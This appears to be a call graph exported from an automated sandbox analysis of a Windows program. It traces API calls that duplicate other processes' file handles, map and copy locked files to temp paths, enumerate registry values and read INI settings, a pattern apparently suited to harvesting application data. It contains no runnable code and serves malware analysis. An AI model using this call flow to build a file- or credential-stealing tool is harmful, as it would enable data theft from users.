39142 40c264 39144 40aebe FindClose 39142->39144 39143 40add4 2 API calls 39143->39149 39145 40c26f 39144->39145 39151 40e5ed memset memset 39145->39151 39146 40c231 _wcsicmp 39148 40c248 39146->39148 39146->39149 39147 40c1d3 35 API calls 39147->39149 39164 40c084 22 API calls 39148->39164 39149->39141 39149->39142 39149->39143 39149->39146 39149->39147 39152 414c2e 16 API calls 39151->39152 39153 40e63f 39152->39153 39154 409d1f 6 API calls 39153->39154 39155 40e658 39154->39155 39165 409b98 GetFileAttributesW 39155->39165 39157 40e667 39158 40e680 39157->39158 39159 409d1f 6 API calls 39157->39159 39166 409b98 GetFileAttributesW 39158->39166 39159->39158 39161 40e68f 39163 40c2d8 39161->39163 39167 40e4b2 39161->39167 39163->39074 39163->39075 39164->39149 39165->39157 39166->39161 39188 40e01e 39167->39188 39169 40e593 39170 40e5b0 39169->39170 39171 40e59c DeleteFileW 39169->39171 39173 40b04b ??3@YAXPAX 39170->39173 39171->39170 39172 40e521 39172->39169 39211 40e175 39172->39211 39175 40e5bb 39173->39175 39177 40e5c4 CloseHandle 39175->39177 39178 40e5cc 39175->39178 39176 40e540 39179 40e573 39176->39179 39231 40e2ab 39176->39231 39177->39178 39180 40b633 ??3@YAXPAX 39178->39180 39182 40e584 39179->39182 39183 40e57c FindCloseChangeNotification 39179->39183 39181 40e5db 39180->39181 39184 40b633 ??3@YAXPAX 39181->39184 39254 40b1ab ??3@YAXPAX ??3@YAXPAX 39182->39254 39183->39182 39186 40e5e3 39184->39186 39186->39163 39189 406214 22 API calls 39188->39189 39190 40e03c 39189->39190 39191 40e16b 39190->39191 39192 40dd85 74 API calls 39190->39192 39191->39172 39193 40e06b 39192->39193 39193->39191 39194 40afcf ??2@YAPAXI ??3@YAXPAX 39193->39194 39195 40e08d OpenProcess 39194->39195 39196 40e152 39195->39196 39197 40e0a4 GetCurrentProcess DuplicateHandle 39195->39197 39200 406214 22 API calls 39196->39200 39203 40e160 39196->39203 39198 40e0d0 GetFileSize 39197->39198 39199 40e14a CloseHandle 39197->39199 39202 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39198->39202 39199->39196 39200->39203 39201 40b04b ??3@YAXPAX 39201->39191 39204 40e0ea 39202->39204 39203->39201 39205 4096dc CreateFileW 39204->39205 39206 40e0f1 CreateFileMappingW 39205->39206 39207 40e140 CloseHandle CloseHandle 39206->39207 39208 40e10b MapViewOfFile 39206->39208 39207->39199 39209 40e13b FindCloseChangeNotification 39208->39209 39210 40e11f WriteFile UnmapViewOfFile 39208->39210 39209->39207 39210->39209 39212 40e18c 39211->39212 39213 406b90 11 API calls 39212->39213 39214 40e19f 39213->39214 39215 40e1a7 memset 39214->39215 39216 40e299 39214->39216 39218 40e1e8 39215->39218 39217 4069a3 ??3@YAXPAX ??3@YAXPAX 39216->39217 39219 40e2a4 39217->39219 39220 406e8f 13 API calls 39218->39220 39221 40dd50 _wcsicmp 39218->39221 39222 406b53 SetFilePointerEx ReadFile 39218->39222 39223 40e283 39218->39223 39227 40742e 8 API calls 39218->39227 39228 40aae3 wcslen wcslen _memicmp 39218->39228 39229 40e244 _snwprintf 39218->39229 39219->39176 39220->39218 39221->39218 39222->39218 39224 40e291 39223->39224 39225 40e288 ??3@YAXPAX 39223->39225 39226 40aa04 ??3@YAXPAX 39224->39226 39225->39224 39226->39216 39227->39218 39228->39218 39230 40a8d0 7 API calls 39229->39230 39230->39218 39232 40e2c2 39231->39232 39233 406b90 11 API calls 39232->39233 39234 40e2d3 39233->39234 39235 40e4a0 39234->39235 39237 406e8f 13 API calls 39234->39237 39239 406b53 SetFilePointerEx ReadFile 39234->39239 39240 40e489 39234->39240 39244 40dd50 _wcsicmp 39234->39244 39245 40dd50 _wcsicmp 39234->39245 39248 40742e 8 API calls 39234->39248 39249 40e3e0 memcpy 39234->39249 39250 40e3b3 wcschr 39234->39250 39251 40e3fb memcpy 39234->39251 39252 40e416 memcpy 39234->39252 39253 40e431 memcpy 39234->39253 39236 4069a3 ??3@YAXPAX ??3@YAXPAX 39235->39236 39238 40e4ab 39236->39238 39237->39234 39238->39176 39239->39234 39241 40aa04 ??3@YAXPAX 39240->39241 39242 40e491 39241->39242 39242->39235 39243 40e497 ??3@YAXPAX 39242->39243 39243->39235 39244->39234 39246 40e376 memset 39245->39246 39247 40aa29 6 API calls 39246->39247 39247->39234 39248->39234 39249->39234 39250->39234 39251->39234 39252->39234 39253->39234 39254->39169 39256 40a980 39255->39256 39257 40a8bb 39256->39257 39258 40a995 _wcsicmp 39256->39258 39259 40a99c wcscmp 39256->39259 39257->39094 39257->39095 39258->39256 39259->39256 39260->39098 39261->39102 39263 40aa23 RegEnumValueW 39262->39263 39263->39109 39263->39110 39265 405335 39264->39265 39266 40522a 39264->39266 39265->38739 39267 40b2cc 27 API calls 39266->39267 39268 405234 39267->39268 39269 40a804 8 API calls 39268->39269 39270 40523a 39269->39270 39309 40b273 39270->39309 39272 405248 _mbscpy _mbscat GetProcAddress 39273 40b273 27 API calls 39272->39273 39274 405279 39273->39274 39312 405211 GetProcAddress 39274->39312 39276 405282 39277 40b273 27 API calls 39276->39277 39278 40528f 39277->39278 39313 405211 GetProcAddress 39278->39313 39280 405298 39281 40b273 27 API calls 39280->39281 39282 4052a5 39281->39282 39314 405211 GetProcAddress 39282->39314 39284 4052ae 39285 40b273 27 API calls 39284->39285 39310 40b58d 27 API calls 39309->39310 39311 40b18c 39310->39311 39311->39272 39312->39276 39313->39280 39314->39284 39322 405220 39 API calls 39321->39322 39323 405369 39322->39323 39323->39127 39323->39128 39324->39130 39325->39134 39326->39131 39327->39128 39329 40440c FreeLibrary 39328->39329 39330 40436d 39329->39330 39331 40a804 8 API calls 39330->39331 39332 404377 39331->39332 39333 404383 39332->39333 39334 404405 39332->39334 39335 40b273 27 API calls 39333->39335 39334->38745 39334->38747 39334->38750 39336 40438d GetProcAddress 39335->39336 39337 40b273 27 API calls 39336->39337 39338 4043a7 GetProcAddress 39337->39338 39339 40b273 27 API calls 39338->39339 39340 4043ba GetProcAddress 39339->39340 39341 40b273 27 API calls 39340->39341 39342 4043ce GetProcAddress 39341->39342 39343 40b273 27 API calls 39342->39343 39344 4043e2 GetProcAddress 39343->39344 39345 4043f1 39344->39345 39346 4043f7 39345->39346 39347 40440c FreeLibrary 39345->39347 39346->39334 39347->39334 39349 404413 FreeLibrary 39348->39349 39350 40441e 39348->39350 39349->39350 39350->38761 39351->38758 39353 40442e 39352->39353 39356 40447e 39352->39356 39354 40b2cc 27 API calls 39353->39354 39355 404438 39354->39355 39357 40a804 8 API calls 39355->39357 39356->38758 39358 40443e 39357->39358 39359 404445 39358->39359 39360 404467 39358->39360 39360->39356 39363 404475 FreeLibrary 39360->39363 39363->39356 39366 4135f6 39365->39366 39367 4135eb FreeLibrary 39365->39367 39366->38764 39367->39366 39395 403a29 39394->39395 39407 403bed memset memset 39395->39407 39397 403ae7 39420 40b1ab ??3@YAXPAX ??3@YAXPAX 39397->39420 39398 403a3f memset 39401 403a2f 39398->39401 39400 4039a3 39400->38798 39400->38799 39401->39397 39401->39398 39402 40a8d0 7 API calls 39401->39402 39403 409d1f 6 API calls 39401->39403 39404 409b98 GetFileAttributesW 39401->39404 39402->39401 39403->39401 39404->39401 39405->38801 39406->38803 39408 414c2e 16 API calls 39407->39408 39409 403c38 39408->39409 39410 409719 2 API calls 39409->39410 39411 403c3f wcscat 39410->39411 39412 414c2e 16 API calls 39411->39412 39413 403c61 39412->39413 39414 409719 2 API calls 39413->39414 39415 403c68 wcscat 39414->39415 39421 403af5 39415->39421 39418 403af5 20 API calls 39419 403c95 39418->39419 39419->39401 39420->39400 39422 403b02 39421->39422 39423 40ae18 9 API calls 39422->39423 39429 403b37 39423->39429 39424 40ae51 9 API calls 39424->39429 39425 403bdb 39426 40aebe FindClose 39425->39426 39428 403be6 39426->39428 39427 40add4 wcscmp wcscmp 39427->39429 39428->39418 39429->39424 39429->39425 39429->39427 39430 40ae18 9 API calls 39429->39430 39431 40aebe FindClose 39429->39431 39432 40a8d0 7 API calls 39429->39432 39430->39429 39431->39429 39432->39429 39434 409d1f 6 API calls 39433->39434 39435 404190 39434->39435 39448 409b98 GetFileAttributesW 39435->39448 39437 40419c 39438 4041a7 6 API calls 39437->39438 39439 40435c 39437->39439 39440 40424f 39438->39440 39439->38824 39440->39439 39442 40425e memset 39440->39442 39444 409d1f 6 API calls 39440->39444 39445 40a8ab 9 API calls 39440->39445 39449 414842 39440->39449 39442->39440 39443 404296 wcscpy 39442->39443 39443->39440 39444->39440 39446 4042b6 memset memset _snwprintf wcscpy 39445->39446 39446->39440 39447->38827 39448->39437 39452 41443e 39449->39452 39451 414866 39451->39440 39453 41444b 39452->39453 39454 414451 39453->39454 39455 4144a3 GetPrivateProfileStringW 39453->39455 39456 414491 39454->39456 39457 414455 wcschr 39454->39457 39455->39451 39459 414495 WritePrivateProfileStringW 39456->39459 39457->39456 39458 414463 _snwprintf 39457->39458 39458->39459 39459->39451 39487 413f4f 39460->39487 39463 413f37 K32GetModuleFileNameExW 39464 413f4a 39463->39464 39464->38843 39466 413969 wcscpy 39465->39466 39467 41396c wcschr 39465->39467 39478 413a3a 39466->39478 39467->39466 39469 41398e 39467->39469 39492 4097f7 wcslen wcslen _memicmp 39469->39492 39471 41399a 39472 4139a4 memset 39471->39472 39473 4139e6 39471->39473 39493 409dd5 GetWindowsDirectoryW wcscpy 39472->39493 39474 413a31 wcscpy 39473->39474 39475 4139ec memset 39473->39475 39474->39478 39494 409dd5 GetWindowsDirectoryW wcscpy 39475->39494 39478->38843 39479 4139c9 wcscpy wcscat 39479->39478 39480 413a11 memcpy wcscat 39480->39478 39482 413cb0 GetModuleHandleW 39481->39482 39483 413cda 39481->39483 39482->39483 39484 413cbf GetProcAddress 39482->39484 39485 413ce3 GetProcessTimes 39483->39485 39486 413cf6 39483->39486 39484->39483 39485->38846 39486->38846 39488 413f2f 39487->39488 39489 413f54 39487->39489 39488->39463 39488->39464 39490 40a804 8 API calls 39489->39490 39491 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39490->39491 39491->39488 39492->39471 39493->39479 39494->39480 39495->38866 39496->38889 39498 409cf9 GetVersionExW 39497->39498 39499 409d0a 39497->39499 39498->39499 39499->38896 39499->38903 39500->38900 39501->38905 39502->38907 39503->38958 39505 40bba5 39504->39505 39639 40cc26 39505->39639 39508 40bd4b 39667 40cc0c 39508->39667 39513 40b2cc 27 API calls 39514 40bbef 39513->39514 39660 40ccf0 39514->39660 39516 40bbf5 39516->39508 39664 40ccb4 39516->39664 39519 40cf04 17 API calls 39520 40bc2e 39519->39520 39521 40bd43 39520->39521 39522 40b2cc 27 API calls 39520->39522 39523 40cc0c 4 API calls 39521->39523 39524 40bc40 39522->39524 39523->39508 39525 40ccf0 _wcsicmp 39524->39525 39526 40bc46 39525->39526 39526->39521 39527 40bc61 memset memset WideCharToMultiByte 39526->39527 39674 40103c strlen 39527->39674 39529 40bcc0 39530 40b273 27 API calls 39529->39530 39531 40bcd0 memcmp 39530->39531 39531->39521 39532 40bce2 39531->39532 39533 404423 37 API calls 39532->39533 39534 40bd10 39533->39534 39534->39521 39535 40bd3a LocalFree 39534->39535 39536 40bd1f memcpy 39534->39536 39535->39521 39536->39535 39537->38973 39539 4438b5 11 API calls 39538->39539 39540 44444c 39539->39540 39541 40b879 39540->39541 39734 415a6d 39540->39734 39541->38976 39541->38977 39543 4442e6 11 API calls 39544 44469e 39543->39544 39544->39541 39547 443d90 111 API calls 39544->39547 39545 444486 39546 4444b9 memcpy 39545->39546 39548 4444a4 39545->39548 39738 415258 39546->39738 39547->39541 39548->39543 39550 444524 39551 444541 39550->39551 39552 44452a 39550->39552 39741 444316 39551->39741 39553 416935 16 API calls 39552->39553 39553->39548 39556 444316 18 API calls 39557 444563 39556->39557 39558 444316 18 API calls 39557->39558 39559 44456f 39558->39559 39560 444316 18 API calls 39559->39560 39561 44457f 39560->39561 39561->39548 39755 432d4e 39561->39755 39564 444316 18 API calls 39565 4445b0 39564->39565 39871 438460 39584->39871 39586 40b8a4 39586->38985 39610 4251c4 39586->39610 39588 443da3 39587->39588 39597 443db6 39587->39597 39589 41707a 11 API calls 39588->39589 39590 443da8 39589->39590 39591 443dbc 39590->39591 39592 443dac 39590->39592 39594 4300e8 3 API calls 39591->39594 39965 4446ea 11 API calls 39592->39965 39598 443dce 39594->39598 39595 443de0 39596 416935 16 API calls 39595->39596 39596->39597 39597->38976 39598->39595 39602 443e22 39598->39602 39599 443e5a 39600 4300e8 3 API calls 39599->39600 39603 443e63 39600->39603 39602->39599 39966 41f0ac 103 API calls 39602->39966 39608 409a74 GetTempFileNameW 39607->39608 39609 409a66 GetWindowsDirectoryW 39607->39609 39608->38971 39609->39608 39968 424f07 39610->39968 39612 4251e4 39613 4251f7 39612->39613 39614 4251e8 39612->39614 39976 4250f8 39613->39976 39975 4446ea 11 API calls 39614->39975 39616 4251f2 39616->39001 39618 425287 39621 425249 39621->39618 39624 425209 39624->39618 39624->39621 39625 4250f8 127 API calls 39624->39625 39984 4384e9 135 API calls 39624->39984 39985 424f74 124 API calls 39624->39985 39625->39624 39628->39001 39629->39001 39630->39001 39631->39001 39632->39001 39633->39001 39634->39001 39635->39001 39636->39001 39637->38985 39675 4096c3 CreateFileW 39639->39675 39641 40cc34 39642 40cc3d GetFileSize 39641->39642 39650 40bbca 39641->39650 39643 40afcf 2 API calls 39642->39643 39644 40cc64 39643->39644 39676 40a2ef ReadFile 39644->39676 39646 40cc71 39677 40ab4a MultiByteToWideChar 39646->39677 39648 40cc95 FindCloseChangeNotification 39649 40b04b ??3@YAXPAX 39648->39649 39649->39650 39650->39508 39651 40cf04 39650->39651 39652 40b633 ??3@YAXPAX 39651->39652 39653 40cf14 39652->39653 39683 40b1ab ??3@YAXPAX ??3@YAXPAX 39653->39683 39655 40bbdd 39655->39508 39655->39513 39656 40cf1b 39656->39655 39658 40cfef 39656->39658 39684 40cd4b 39656->39684 39659 40cd4b 14 API calls 39658->39659 39659->39655 39661 40cd3f 39660->39661 39662 40ccfd 39660->39662 39661->39516 39662->39661 39663 40cd26 _wcsicmp 39662->39663 39663->39661 39663->39662 39665 40aa29 6 API calls 39664->39665 39666 40bc26 39665->39666 39666->39519 39668 40b633 ??3@YAXPAX 39667->39668 39669 40cc15 39668->39669 39670 40aa04 ??3@YAXPAX 39669->39670 39671 40cc1d 39670->39671 39733 40b1ab ??3@YAXPAX ??3@YAXPAX 39671->39733 39673 40b7d4 memset CreateFileW 39673->38965 39673->38966 39674->39529 39675->39641 39676->39646 39678 40ab93 39677->39678 39679 40ab6b 39677->39679 39678->39648 39680 40a9ce 4 API calls 39679->39680 39681 40ab74 39680->39681 39682 40ab7c MultiByteToWideChar 39681->39682 39682->39678 39683->39656 39685 40cd7b 39684->39685 39718 40aa29 39685->39718 39687 40cef5 39688 40aa04 ??3@YAXPAX 39687->39688 39689 40cefd 39688->39689 39689->39656 39691 40aa29 6 API calls 39692 40ce1d 39691->39692 39693 40aa29 6 API calls 39692->39693 39694 40ce3e 39693->39694 39695 40ce6a 39694->39695 39726 40abb7 wcslen memmove 39694->39726 39696 40ce9f 39695->39696 39729 40abb7 wcslen memmove 39695->39729 39699 40a8d0 7 API calls 39696->39699 39698 40ce56 39727 40aa71 wcslen 39698->39727 39702 40ceb5 39699->39702 39707 40a8d0 7 API calls 39702->39707 39703 40ce8b 39730 40aa71 wcslen 39703->39730 39704 40ce5e 39728 40abb7 wcslen memmove 39704->39728 39709 40cecb 39707->39709 39708 40ce93 39731 40abb7 wcslen memmove 39708->39731 39732 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39709->39732 39712 40cedd 39713 40aa04 ??3@YAXPAX 39712->39713 39714 40cee5 39713->39714 39715 40aa04 ??3@YAXPAX 39714->39715 39716 40ceed 39715->39716 39717 40aa04 ??3@YAXPAX 39716->39717 39717->39687 39719 40aa33 39718->39719 39720 40aa63 39718->39720 39721 40aa44 39719->39721 39722 40aa38 wcslen 39719->39722 39720->39687 39720->39691 39723 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39721->39723 39722->39721 39724 40aa4d 39723->39724 39724->39720 39725 40aa51 memcpy 39724->39725 39725->39720 39726->39698 39727->39704 39728->39695 39729->39703 39730->39708 39731->39696 39732->39712 39733->39673 39735 415a77 39734->39735 39736 415a8d 39735->39736 39737 415a7e memset 39735->39737 39736->39545 39737->39736 39739 4438b5 11 API calls 39738->39739 39740 41525d 39739->39740 39740->39550 39742 444328 39741->39742 39743 444423 39742->39743 39744 44434e 39742->39744 39808 4446ea 11 API calls 39743->39808 39746 432d4e 3 API calls 39744->39746 39747 44435a 39746->39747 39748 44438b 39747->39748 39751 444375 39747->39751 39749 432d4e 3 API calls 39748->39749 39750 4443ec 39749->39750 39752 444381 39750->39752 39754 416935 16 API calls 39750->39754 39753 416935 16 API calls 39751->39753 39752->39556 39753->39752 39754->39752 39756 432d65 39755->39756 39757 432d58 39755->39757 39756->39564 39809 432cc4 memset memset memcpy 39757->39809 39808->39752 39809->39756 39883 41703f 39871->39883 39873 43847a 39874 43848a 39873->39874 39875 43847e 39873->39875 39890 438270 39874->39890 39920 4446ea 11 API calls 39875->39920 39877 438488 39877->39586 39881 4384bb 39882 438270 134 API calls 39881->39882 39882->39877 39884 41705c 39883->39884 39889 417044 39883->39889 39885 417075 39884->39885 39886 41707a 11 API calls 39884->39886 39885->39873 39886->39889 39888 417055 39888->39873 39889->39888 39922 416760 11 API calls 39889->39922 39891 415a91 memset 39890->39891 39892 43828d 39891->39892 39893 438341 39892->39893 39895 4382d6 39892->39895 39919 438297 39892->39919 39923 44358f 39893->39923 39894 415c7d 16 API calls 39897 438458 39894->39897 39898 4382fb 39895->39898 39899 4382db 39895->39899 39897->39877 39921 424f26 123 API calls 39897->39921 39954 415c23 memcpy 39898->39954 39901 416935 16 API calls 39899->39901 39903 4382e9 39901->39903 39902 438305 39906 44358f 19 API calls 39902->39906 39908 438318 39902->39908 39904 415c7d 16 API calls 39903->39904 39904->39919 39905 438373 39910 438383 39905->39910 39955 4300e8 39905->39955 39906->39908 39908->39905 39949 43819e 39908->39949 39911 4383cd 39910->39911 39963 415c23 memcpy 39910->39963 39912 4383f5 39911->39912 39964 42453e 123 API calls 39911->39964 39915 438404 39912->39915 39916 43841c 39912->39916 39918 416935 16 API calls 39915->39918 39917 416935 16 API calls 39916->39917 39917->39919 39918->39919 39919->39894 39920->39877 39921->39881 39922->39888 39926 4435be 39923->39926 39924 443758 39928 441409 memset 39924->39928 39938 443775 39924->39938 39925 443676 39925->39924 39927 443737 39925->39927 39930 442ff8 19 API calls 39925->39930 39926->39925 39929 4436ce 39926->39929 39932 442ff8 19 API calls 39926->39932 39933 44366c 39926->39933 39948 44360c 39926->39948 39931 442ff8 19 API calls 39927->39931 39928->39924 39935 4165ff 11 API calls 39929->39935 39930->39927 39931->39924 39932->39926 39936 4169a7 11 API calls 39933->39936 39934 4437be 39937 416760 11 API calls 39934->39937 39939 4437de 39934->39939 39935->39925 39936->39925 39937->39939 39938->39934 39943 415c56 11 API calls 39938->39943 39940 42463b memset memcpy 39939->39940 39942 443801 39939->39942 39940->39942 39941 443826 39945 43bd08 memset 39941->39945 39942->39941 39944 43024d memset 39942->39944 39943->39934 39944->39941 39946 443837 39945->39946 39946->39948 39948->39908 39950 438246 39949->39950 39952 4381ba 39949->39952 39950->39905 39951 41f432 110 API calls 39951->39952 39952->39950 39952->39951 39953 41f638 104 API calls 39952->39953 39953->39952 39954->39902 39956 4300fa 39955->39956 39957 430128 39955->39957 39956->39957 39958 432f8c memset 39956->39958 39962 4301de 39956->39962 39959 430196 memset 39957->39959 39958->39956 39960 4301bc 39959->39960 39959->39962 39961 4301c9 memcpy 39960->39961 39960->39962 39961->39962 39962->39910 39963->39911 39964->39912 39965->39597 39966->39602 39969 424f1f 39968->39969 39970 424f0c 39968->39970 39989 424eea 11 API calls 39969->39989 39988 416760 11 API calls 39970->39988 39973 424f18 39973->39612 39974 424f24 39974->39612 39975->39616 39977 425108 39976->39977 39981 42510d 39976->39981 40022 424f74 124 API calls 39977->40022 39982 425115 39981->39982 39990 42569b 39981->39990 39982->39624 39984->39624 39985->39624 39988->39973 39989->39974 39991 4259c2 39990->39991 40006 4256f1 39990->40006 39993 429ac1 39997 4259da 40000 429a4d 40003 422aeb memset memcpy memcpy 40003->40006 40006->39991 40006->39993 40006->39997 40006->40000 40006->40003 40010 4260a1 40006->40010 40021 425a38 40006->40021 40023 4227f0 memset memcpy 40006->40023 40024 422b84 15 API calls 40006->40024 40025 422b5d memset memcpy memcpy 40006->40025 40026 422640 13 API calls 40006->40026 40028 4241fc 11 API calls 40006->40028 40029 42413a 90 API calls 40006->40029 40021->39991 40022->39981 40023->40006 40024->40006 40025->40006 40026->40006 40028->40006 40029->40006 40040->39045 40041->39053 40042 4147f3 40045 414561 40042->40045 40044 414813 40046 41456d 40045->40046 40047 41457f GetPrivateProfileIntW 40045->40047 40050 4143f1 memset _itow WritePrivateProfileStringW 40046->40050 40047->40044 40049 41457a 40049->40044 40050->40049 40051 44def7 40052 44df07 40051->40052 40053 44df00 ??3@YAXPAX 40051->40053 40054 44df17 40052->40054 40055 44df10 ??3@YAXPAX 40052->40055 40053->40052 40056 44df27 40054->40056 40057 44df20 ??3@YAXPAX 40054->40057 40055->40054 40058 44df37 40056->40058 40059 44df30 ??3@YAXPAX 40056->40059 40057->40056 40059->40058 40060 4148b6 FindResourceW 40061 4148cf SizeofResource 40060->40061 40064 4148f9 40060->40064 40062 4148e0 LoadResource 40061->40062 40061->40064 40063 4148ee LockResource 40062->40063 40062->40064 40063->40064 40065 441b3f 40075 43a9f6 40065->40075 40067 441b61 40248 4386af memset 40067->40248 40069 44189a 40070 442bd4 40069->40070 40071 4418e2 40069->40071 40072 4418ea 40070->40072 40250 441409 memset 40070->40250 40071->40072 40249 4414a9 12 API calls 40071->40249 40076 43aa20 40075->40076 40083 43aadf 40075->40083 40077 43aa34 memset 40076->40077 40076->40083 40078 43aa56 40077->40078 40079 43aa4d 40077->40079 40251 43a6e7 40078->40251 40259 42c02e memset 40079->40259 40083->40067 40085 43aad3 40261 4169a7 11 API calls 40085->40261 40086 43aaae 40086->40083 40086->40085 40101 43aae5 40086->40101 40088 43ac18 40090 43ac47 40088->40090 40263 42bbd5 memcpy memcpy memcpy memset memcpy 40088->40263 40091 43aca8 40090->40091 40264 438eed 16 API calls 40090->40264 40094 43acd5 40091->40094 40266 4233ae 11 API calls 40091->40266 40267 423426 11 API calls 40094->40267 40095 43ac87 40265 4233c5 16 API calls 40095->40265 40099 43ace1 40268 439811 163 API calls 40099->40268 40100 43a9f6 161 API calls 40100->40101 40101->40083 40101->40088 40101->40100 40262 439bbb 22 API calls 40101->40262 40103 43acfd 40104 43ad2c 40103->40104 40269 438eed 16 API calls 40103->40269 40107 43ad58 40104->40107 40111 43add9 40104->40111 40106 43ad19 40270 4233c5 16 API calls 40106->40270 40271 44081d 163 API calls 40107->40271 40275 423426 11 API calls 40111->40275 40112 43ae3a memset 40113 43ae73 40112->40113 40276 42e1c0 147 API calls 40113->40276 40114 43adab 40273 438c4e 163 API calls 40114->40273 40116 43ad6c 40116->40083 40116->40114 40272 42370b memset memcpy memset 40116->40272 40118 43adcc 40274 440f84 12 API calls 40118->40274 40119 43ae96 40277 42e1c0 147 API calls 40119->40277 40123 43aea8 40124 43aec1 40123->40124 40278 42e199 147 API calls 40123->40278 40126 43af00 40124->40126 40279 42e1c0 147 API calls 40124->40279 40126->40083 40129 43af1a 40126->40129 40130 43b3d9 40126->40130 40280 438eed 16 API calls 40129->40280 40135 43b3f6 40130->40135 40140 43b4c8 40130->40140 40132 43b60f 40132->40083 40339 4393a5 17 API calls 40132->40339 40133 43af2f 40281 4233c5 16 API calls 40133->40281 40321 432878 12 API calls 40135->40321 40137 43af51 40282 423426 11 API calls 40137->40282 40139 43b4f2 40328 43a76c 21 API calls 40139->40328 40140->40139 40327 42bbd5 memcpy memcpy memcpy memset memcpy 40140->40327 40142 43af7d 40283 423426 11 API calls 40142->40283 40146 43b529 40329 44081d 163 API calls 40146->40329 40147 43b462 40323 423330 11 API calls 40147->40323 40148 43af94 40284 423330 11 API calls 40148->40284 40152 43b47e 40156 43b497 40152->40156 40324 42374a memcpy memset memcpy memcpy memcpy 40152->40324 40153 43b544 40157 43b55c 40153->40157 40330 42c02e memset 40153->40330 40154 43b428 40154->40147 40322 432b60 16 API calls 40154->40322 40155 43afca 40285 423330 11 API calls 40155->40285 40325 4233ae 11 API calls 40156->40325 40331 43a87a 163 API calls 40157->40331 40162 43afdb 40286 4233ae 11 API calls 40162->40286 40164 43b56c 40168 43b58a 40164->40168 40332 423330 11 API calls 40164->40332 40165 43b4b1 40326 423399 11 API calls 40165->40326 40167 43afee 40287 44081d 163 API calls 40167->40287 40333 440f84 12 API calls 40168->40333 40173 43b4c1 40335 42db80 163 API calls 40173->40335 40175 43b592 40334 43a82f 16 API calls 40175->40334 40178 43b5b4 40336 438c4e 163 API calls 40178->40336 40180 43b5cf 40337 42c02e memset 40180->40337 40182 43b1ef 40298 4233c5 16 API calls 40182->40298 40183 43add4 40183->40132 40338 438f86 16 API calls 40183->40338 40184 43b005 40184->40083 40186 43b01f 40184->40186 40288 42d836 163 API calls 40184->40288 40186->40182 40296 423330 11 API calls 40186->40296 40297 42d71d 163 API calls 40186->40297 40187 43b212 40299 423330 11 API calls 40187->40299 40189 43b087 40289 4233ae 11 API calls 40189->40289 40194 43b22a 40300 42ccb5 11 API calls 40194->40300 40196 43b10f 40292 423330 11 API calls 40196->40292 40197 43b23f 40301 4233ae 11 API calls 40197->40301 40199 43b257 40302 4233ae 11 API calls 40199->40302 40203 43b129 40293 4233ae 11 API calls 40203->40293 40204 43b26e 40303 4233ae 11 API calls 40204->40303 40207 43b09a 40207->40196 40290 42cc15 19 API calls 40207->40290 40291 4233ae 11 API calls 40207->40291 40208 43b282 40304 43a87a 163 API calls 40208->40304 40210 43b13c 40294 440f84 12 API calls 40210->40294 40212 43b29d 40305 423330 11 API calls 40212->40305 40215 43b15f 40295 4233ae 11 API calls 40215->40295 40216 43b2af 40218 43b2b8 40216->40218 40219 43b2ce 40216->40219 40306 4233ae 11 API calls 40218->40306 40307 440f84 12 API calls 40219->40307 40222 43b2da 40308 42370b memset memcpy memset 40222->40308 40223 43b2c9 40309 4233ae 11 API calls 40223->40309 40226 43b2f9 40310 423330 11 API calls 40226->40310 40228 43b30b 40311 423330 11 API calls 40228->40311 40230 43b325 40312 423399 11 API calls 40230->40312 40232 43b332 40313 4233ae 11 API calls 40232->40313 40234 43b354 40314 423399 11 API calls 40234->40314 40236 43b364 40315 43a82f 16 API calls 40236->40315 40238 43b370 40316 42db80 163 API calls 40238->40316 40240 43b380 40317 438c4e 163 API calls 40240->40317 40242 43b39e 40318 423399 11 API calls 40242->40318 40244 43b3ae 40319 43a76c 21 API calls 40244->40319 40246 43b3c3 40320 423399 11 API calls 40246->40320 40248->40069 40249->40072 40250->40070 40252 43a6f5 40251->40252 40253 43a765 40251->40253 40252->40253 40340 42a115 40252->40340 40253->40083 40260 4397fd memset 40253->40260 40257 43a73d 40257->40253 40258 42a115 147 API calls 40257->40258 40258->40253 40259->40078 40260->40086 40261->40083 40262->40101 40263->40090 40264->40095 40265->40091 40266->40094 40267->40099 40268->40103 40269->40106 40270->40104 40271->40116 40272->40114 40273->40118 40274->40183 40275->40112 40276->40119 40277->40123 40278->40124 40279->40124 40280->40133 40281->40137 40282->40142 40283->40148 40284->40155 40285->40162 40286->40167 40287->40184 40288->40189 40289->40207 40290->40207 40291->40207 40292->40203 40293->40210 40294->40215 40295->40186 40296->40186 40297->40186 40298->40187 40299->40194 40300->40197 40301->40199 40302->40204 40303->40208 40304->40212 40305->40216 40306->40223 40307->40222 40308->40223 40309->40226 40310->40228 40311->40230 40312->40232 40313->40234 40314->40236 40315->40238 40316->40240 40317->40242 40318->40244 40319->40246 40320->40183 40321->40154 40322->40147 40323->40152 40324->40156 40325->40165 40326->40173 40327->40139 40328->40146 40329->40153 40330->40157 40331->40164 40332->40168 40333->40175 40334->40173 40335->40178 40336->40180 40337->40183 40338->40132 40339->40083 40341 42a175 40340->40341 40343 42a122 40340->40343 40341->40253 40346 42b13b 147 API calls 40341->40346 40343->40341 40344 42a115 147 API calls 40343->40344 40347 43a174 40343->40347 40371 42a0a8 147 API calls 40343->40371 40344->40343 40346->40257 40348 43a196 40347->40348 40352 43a19e 40347->40352 40348->40343 40351 415a91 memset 40351->40352 40352->40348 40352->40351 40360 43a306 40352->40360 40362 42a115 147 API calls 40352->40362 40372 42ff8c 40352->40372 40380 4165ff 40352->40380 40383 439504 13 API calls 40352->40383 40384 4312d0 147 API calls 40352->40384 40385 42be4c memcpy memcpy memcpy memset memcpy 40352->40385 40386 43a121 11 API calls 40352->40386 40356 43a642 40356->40348 40391 4169a7 11 API calls 40356->40391 40360->40348 40387 4388c4 14 API calls 40360->40387 40362->40352 40363 4169a7 11 API calls 40368 43a325 40363->40368 40364 43a635 40390 42c02e memset 40364->40390 40365 42b5b5 memset memcpy 40365->40368 40366 42bf4c 14 API calls 40366->40368 40368->40348 40368->40356 40368->40363 40368->40364 40368->40365 40368->40366 40369 4165ff 11 API calls 40368->40369 40388 42b63e 14 API calls 40368->40388 40389 42bfcf memcpy 40368->40389 40369->40368 40371->40343 40392 43817e 40372->40392 40374 42ff99 40375 42ff9d 40374->40375 40376 42ffe3 40374->40376 40377 42ffd0 40374->40377 40375->40352 40397 4169a7 11 API calls 40376->40397 40396 4169a7 11 API calls 40377->40396 